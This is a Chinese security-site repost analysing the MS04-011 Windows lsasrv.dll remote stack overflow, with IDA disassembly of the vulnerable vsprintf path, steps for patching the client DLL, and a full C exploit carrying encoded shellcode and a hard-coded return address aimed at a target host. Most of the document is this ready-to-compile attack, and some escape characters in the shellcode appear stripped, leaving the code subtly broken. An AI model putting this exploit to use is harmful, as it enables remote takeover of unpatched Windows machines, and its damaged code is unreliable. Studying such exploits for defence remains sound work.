（阅读次数：）

Windowslsasrv.dll远程溢出分析

by: mslug#safechina.net
eEye的文档里已经分析的比较清楚了.这里贴一下相关的代码和exp.eEye提出重现这个漏洞最简单的方法是:改变DsRoleUpgradeDownlevelServer API中的指令,使传给DsRolepEncryptPasswordStart的第一个实参变为DsRoleUpgradeDownlevelServer的第九个型参,及将 .text:751AD5F7 lea eax, [ebp+var_34]
.text:751AD5FA push eax
.text:751AD5FB push 0
.text:751AD5FD call _DsRolepEncryptPasswordStart@24 改为 .text:751AD5F7 push eax
mov eax, [ebp+var_34]
push eax
nop
call _DsRolepEncryptPasswordStart@24 然后调用DsRoleUpgradeDownlevelServer就可以了.自己动手改一下吧,(靠,怎么有了破解的感觉 :)
最后感谢oyxin,本来已经不打算调这个东东了. :) 下面是有漏洞的代码部分: LSASRV!DsRolerUpgradeDownlevelServer
│
----_DsRolepLogPrintRoutine
│
----_DsRolepDebugDumpRoutine
│
----__imp__vsprintf
.text:7859B6D6 ; __stdcall DsRolerUpgradeDownlevelServer(x,x,x,x,x,x,x,x,x,x,x,x,x)
.text:7859B6D6 _DsRolerUpgradeDownlevelServer@52 proc near ; DATA XREF: .text:7855B93Co
.text:7859B6D6
.text:7859B6D6 var_40 = byte ptr -40h
.text:7859B6D6 var_28 = byte ptr -28h
.text:7859B6D6 var_20 = byte ptr -20h
.text:7859B6D6 var_18 = dword ptr -18h
.text:7859B6D6 var_14 = dword ptr -14h
.text:7859B6D6 Data = byte ptr -10h
.text:7859B6D6 var_C = dword ptr -0Ch
.text:7859B6D6 var_8 = dword ptr -8
.text:7859B6D6 var_4 = dword ptr -4
.text:7859B6D6 arg_0 = dword ptr 8
.text:7859B6D6 arg_4 = dword ptr 0Ch
.text:7859B6D6 arg_8 = dword ptr 10h
.text:7859B6D6 arg_C = dword ptr 14h
.text:7859B6D6 arg_10 = dword ptr 18h
.text:7859B6D6 arg_14 = dword ptr 1Ch
.text:7859B6D6 arg_18 = dword ptr 20h
.text:7859B6D6 arg_1C = dword ptr 24h
.text:7859B6D6 arg_20 = dword ptr 28h
.text:7859B6D6 arg_24 = dword ptr 2Ch
.text:7859B6D6 arg_28 = dword ptr 30h
.text:7859B6D6 arg_2C = dword ptr 34h
.text:7859B6D6 arg_30 = dword ptr 38h
.text:7859B6D6
.text:7859B6D6 push ebp
.text:7859B6D7 mov ebp, esp
.text:7859B6D9 sub esp, 40h
.text:7859B6DC mov eax, [ebp+arg_24]
.text:7859B6DF push ebx
.text:7859B6E0 mov [ebp+var_18], eax
.text:7859B6E3 mov eax, [ebp+arg_28]
.text:7859B6E6 push esi
.text:7859B6E7 push edi
.text:7859B6E8 mov [ebp+var_14], eax
.text:7859B6EB xor eax, eax
.text:7859B6ED lea edi, [ebp+var_28]
.text:7859B6F0 xor ebx, ebx
.text:7859B6F2 stosd
.text:7859B6F3 stosd
.text:7859B6F4 and byte ptr [ebp+var_C], bl
.text:7859B6F7 cmp [ebp+arg_4], ebx
.text:7859B6FA stosd
.text:7859B6FB stosd
.text:7859B6FC mov eax, [ebp+arg_30]
.text:7859B6FF mov [ebp+var_4], ebx
.text:7859B702 mov [ebp+var_8], ebx
.text:7859B705 mov [eax], ebx
.text:7859B707 jz loc_7859B93F
.text:7859B70D cmp [ebp+arg_C], ebx
.text:7859B710 jz loc_7859B93F
.text:7859B716 cmp [ebp+arg_10], ebx
.text:7859B719 jz loc_7859B93F
.text:7859B71F cmp [ebp+arg_14], ebx
.text:7859B722 jz loc_7859B93F
.text:7859B728 call _DsRolepInitializeLog@0 ; DsRolepInitializeLog()
.text:7859B72D push [ebp+arg_4]
.text:7859B730 push offset aDsrolerdcasdcD ; "DsRolerDcAsDc: DnsDomainName %ws "
.text:7859B735 push 4
.text:7859B737 pop esi
.text:7859B738 push esi
.text:7859B739 call _DsRolepLogPrintRoutine
.text:7859B73E mov eax, [ebp+arg_8]
.text:7859B741 add esp, 0Ch
.text:7859B744 cmp eax, ebx
.text:7859B746 jnz short loc_7859B74D
.text:7859B748 mov eax, offset aNull ; "(NULL)"
.text:785A059D _DsRolepLogPrintRoutine proc near ; CODE XREF: DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+ADp
.text:785A059D ; DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+BDp ...
.text:785A059D
.text:785A059D NumberOfBytesWritten= dword ptr 4
.text:785A059D arg_4 = dword ptr 8
.text:785A059D arg_8 = dword ptr 0Ch
.text:785A059D
.text:785A059D lea eax, [esp+arg_8]
.text:785A05A1 push eax ; int
.text:785A05A2 push [esp+4+arg_4] ; int
.text:785A05A6 push [esp+8+NumberOfBytesWritten] ; NumberOfBytesWritten
.text:785A05AA call _DsRolepDebugDumpRoutine@12 ; DsRolepDebugDumpRoutine(x,x,x)
.text:785A05AF retn
.text:785A05AF _DsRolepLogPrintRoutine endp
.text:785A047E ; ??????????????? S U B R O U T I N E ???????????????????????????????????????
.text:785A047E
.text:785A047E ; Attributes: bp-based frame
.text:785A047E
.text:785A047E ; int __stdcall DsRolepDebugDumpRoutine(DWORD NumberOfBytesWritten,int,int)
.text:785A047E _DsRolepDebugDumpRoutine@12 proc near ; CODE XREF: _DsRolepLogPrintRoutine+Dp
.text:785A047E
.text:785A047E var_816 = byte ptr -816h
.text:785A047E var_815 = byte ptr -815h
.text:785A047E Buffer = byte ptr -814h
.text:785A047E var_813 = byte ptr -813h
.text:785A047E SystemTime = _SYSTEMTIME ptr -10h
.text:785A047E NumberOfBytesWritten= dword ptr 8
.text:785A047E arg_4 = dword ptr 0Ch
.text:785A047E arg_8 = dword ptr 10h
.text:785A047E
.text:785A047E push ebp
.text:785A047F mov ebp, esp
.text:785A0481 sub esp, 814h
.text:785A0487 push ebx
.text:785A0488 xor ebx, ebx
.text:785A048A cmp _DsRolepLogFile, ebx
.text:785A0490 jz loc_785A056F
.text:785A0496 push edi
.text:785A0497 push esi
.text:785A0498 xor esi, esi
.text:785A049A cmp dword_785B35B8, ebx
.text:785A04A0 jz short loc_785A04EC
.text:785A04A2 test byte ptr [ebp+NumberOfBytesWritten], 1
.text:785A04A6 jz loc_785A0574
.text:785A04AC mov esi, offset dword_78564F90
.text:785A04B1
.text:785A04B1 loc_785A04B1: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+101j
.text:785A04B1 ; DsRolepDebugDumpRoutine(x,x,x)+10Fj ...
.text:785A04B1 lea eax, [ebp+SystemTime]
.text:785A04B4 push eax ; lpSystemTime
.text:785A04B5 call ds:__imp__GetLocalTime@4 ; __declspec(dllimport) GetLocalTime(x)
.text:785A04BB movzx eax, [ebp+SystemTime.wSecond]
.text:785A04BF push esi
.text:785A04C0 push eax
.text:785A04C1 movzx eax, [ebp+SystemTime.wMinute]
.text:785A04C5 push eax
.text:785A04C6 movzx eax, [ebp+SystemTime.wHour]
.text:785A04CA push eax
.text:785A04CB movzx eax, [ebp+SystemTime.wDay]
.text:785A04CF push eax
.text:785A04D0 movzx eax, [ebp+SystemTime.wMonth]
.text:785A04D4 push eax
.text:785A04D5 lea eax, [ebp+Buffer]
.text:785A04DB push offset a02u02u02u02u02 ; "%02u/%02u %02u:%02u:%02u %s"
.text:785A04E0 push eax
.text:785A04E1 call ds:__imp__sprintf
.text:785A04E7 add esp, 20h
.text:785A04EA mov esi, eax
.text:785A04EC
.text:785A04EC loc_785A04EC: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+22j
.text:785A04EC push [ebp+arg_8]
.text:785A04EF lea eax, [ebp+esi+Buffer]
.text:785A04F6 push [ebp+arg_4]
.text:785A04F9 push eax
.text:785A04FA call ds:__imp__vsprintf
.text:785A0500 add esp, 0Ch
.text:785A0503 add esi, eax
.text:785A0505 jz short loc_785A051B
.text:785A0507 cmp [ebp+esi+var_815], 0Ah
.text:785A050F mov dword_785B35B8, 1
.text:785A0519 jz short loc_785A0521
.text:785A051B -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /******************************************************************
* Windows Lsasrv.dll RPC Remote Exploit
* [MS04-011]
*
* Bug found by: eEye (CoOL!!! :)
*
* Author: mslug (a1476854#hotmail.com), All rights reserved.
*
* Version: 0.2
*
* Tested: Win2k pro en sp4
*
* Compile: cl winlsass.c
*
* Date: 22 Apr 2004
*******************************************************************/ #include <windows.h> /* from www.cnhonker.com */
unsigned char scode[] =
// decode
"xEBx10x5Fx4fx33xC9x66xB9x7Dx01x80x34x0Fx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
// shellcode
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x99xACxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";
#define call_ebx 0x78542001 //lsasrv.dll int WINAPI (*DsRoleUpgradeDownlevelServer)
(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD, DWORD, DWORD); #define LEN 10000 char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2000];
char target2[200]; int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret;
int i;
char c, *target; if (argc < 2) {
printf("%s <target_host>", argv[0]);
return 0;
}

target = argv[1];

hNetapi = LoadLibrary("myNetapi.dll");
if (!hNetapi) {
printf("[-] Can"t load myNetapi32.dll. ");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("[-] Can"t find function. ");
exit(0);
}

memset(buf, "x90", LEN);

memcpy(&buf[2840], "xebx06xebx06", 4);
*(DWORD *)&buf[2844] = call_ebx;
memcpy(&buf[2856], scode, strlen(scode));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
} memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2000);

DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]); return 0;
}

分享收藏到:　

上一篇：Windowslsasrv.dll远程溢出分析下一篇：获得进程的EPROCESS
[本文源自互联网，版权归原作者，转摘为学习参考使用]

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

匿名评论

数据挖掘论坛导航